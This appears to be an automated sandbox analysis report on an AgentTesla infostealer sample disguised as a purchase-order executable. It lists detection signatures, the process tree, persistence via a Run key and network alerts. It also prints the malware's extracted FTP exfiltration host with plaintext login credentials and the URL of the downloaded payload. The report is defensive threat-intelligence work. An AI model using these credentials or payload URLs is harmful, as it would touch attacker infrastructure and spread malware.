Windows Analysis Report
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Overview

General Information

Sample name:PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Analysis ID:1527719
MD5:68b39ced0840d43e3a03e2f92c268c72
SHA1:9dfb2ce520e0df7000d2c2a05a012d4446904480
SHA256:d96d65aab0e55fb6e3d470c7dc58c8c6e687c81df626b60c7461c9349734d240
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe" MD5: 68B39CED0840D43E3A03E2F92C268C72)
    • InstallUtil.exe (PID: 5796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Avycqjqvmh.exe (PID: 2472 cmdline: "C:\Users\user\AppData\Roaming\Avycqjqvmh.exe" MD5: 68B39CED0840D43E3A03E2F92C268C72)
    • InstallUtil.exe (PID: 5996 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Avycqjqvmh.exe (PID: 928 cmdline: "C:\Users\user\AppData\Roaming\Avycqjqvmh.exe" MD5: 68B39CED0840D43E3A03E2F92C268C72)
    • InstallUtil.exe (PID: 7140 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.2951059742.0000000003087000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.1966327299.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
5.2.Avycqjqvmh.exe.3f9ba40.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5a60000.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | Strings:
                      • 0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                      System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, ProcessId: 7096, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Avycqjqvmh
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T09:13:37.746922+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 5.2.84.236 | 21 | TCP
2024-10-07T09:13:49.942457+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 5.2.84.236 | 21 | TCP
2024-10-07T09:13:57.535391+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 5.2.84.236 | 21 | TCP
2024-10-07T09:13:38.457461+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 5.2.84.236 | 61569 | TCP
2024-10-07T09:13:38.462799+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 5.2.84.236 | 61569 | TCP
2024-10-07T09:13:50.650246+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 5.2.84.236 | 50003 | TCP
2024-10-07T09:13:50.656811+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 5.2.84.236 | 50003 | TCP
2024-10-07T09:13:58.222414+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 5.2.84.236 | 49640 | TCP
2024-10-07T09:13:58.227737+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 5.2.84.236 | 49640 | TCP

                      AV Detection

Source: 1.2.InstallUtil.exe.400000.0.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source: wymascensores.com, Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe, ReversingLabs: Detection: 63%
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, ReversingLabs: Detection: 63%
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, Virustotal: Detection: 27%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe, Joe Sandbox ML: detected
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, Joe Sandbox ML: detected
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000003436000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003EA6000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003CB8000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp

                      Networking

Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49732 -> 5.2.84.236:61569
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49731 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49735 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49740 -> 5.2.84.236:50003
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49743 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 5.2.84.236:49640
Source: global traffic, TCP traffic: 5.2.84.236 ports 61569,1,2,50003,49640,21
Source: global traffic, TCP traffic: 192.168.2.4:49732 -> 5.2.84.236:61569
Source: global traffic, HTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 67.212.175.162
Source: Joe Sandbox View, IP Address: 5.2.84.236
Source: Joe Sandbox View, ASN Name: ALASTYRTR
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, FTP traffic detected: 5.2.84.236:21 -> 192.168.2.4:49731
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 100 allowed.
220-Local time is now 10:13. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 10 minutes of inactivity.
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /index/Nbyrwv.dat HTTP/1.1, Host: wymascensores.com, Connection: Keep-Alive
Source: global traffic, DNS traffic detected: DNS query: wymascensores.com
Source: global traffic, DNS traffic detected: DNS query: ftp.alternatifplastik.com
                      Source: InstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000332C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000248C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1857971492.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.1937354915.000000000247E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2951059742.000000000309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.000000000388F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.1851383045.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1966327299.0000000003D8E000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.0000000004341000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1878230324.000000000407F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002751000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000002.00000002.1856237995.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Avycqjqvmh.exe, 00000005.00000002.1936842085.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/index/Nbyrwv.datxC
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49742 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, SKTzxzsJw.cs, .Net Code: RePIUNFdBeM

                      System Summary

                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3815980.1.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.Avycqjqvmh.exe.3fe5bd8.5.raw.unpack, type: UNPACKEDPE Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: initial sample Static PE information: Filename: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Code function: 0_2_05B46560 NtResumeThread,0_2_05B46560
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Code function: 0_2_05B44C20 NtProtectVirtualMemory,0_2_05B44C20
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Code function: 0_2_05B46558 NtResumeThread,0_2_05B46558
                      Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Code function: 0_2_05B44C19 NtProtectVirtualMemory,0_2_05B44C19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 2_2_06364C20 NtProtectVirtualMemory,2_2_06364C20
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 2_2_06366560 NtResumeThread,2_2_06366560
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 2_2_06364C19 NtProtectVirtualMemory,2_2_06364C19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 2_2_06366558 NtResumeThread,2_2_06366558
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 5_2_06114C20 NtProtectVirtualMemory,5_2_06114C20
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 5_2_06116560 NtResumeThread,5_2_06116560
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 5_2_06114C19 NtProtectVirtualMemory,5_2_06114C19
                      Source: C:\Users\user\AppData\Roaming\Avycqjqvmh.exe Code function: 5_2_06116558 NtResumeThread,5_2_06116558
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe Binary or memory string: OriginalFilename vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1748243169.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000000.1695366925.00000000003D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameLezykyyxwi.exe6 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1747306614.0000000005840000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameXxrothk.dll" vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1745985034.00000000037E8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1730290964.0000000002798000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
                      Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1729456286.000000000082E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
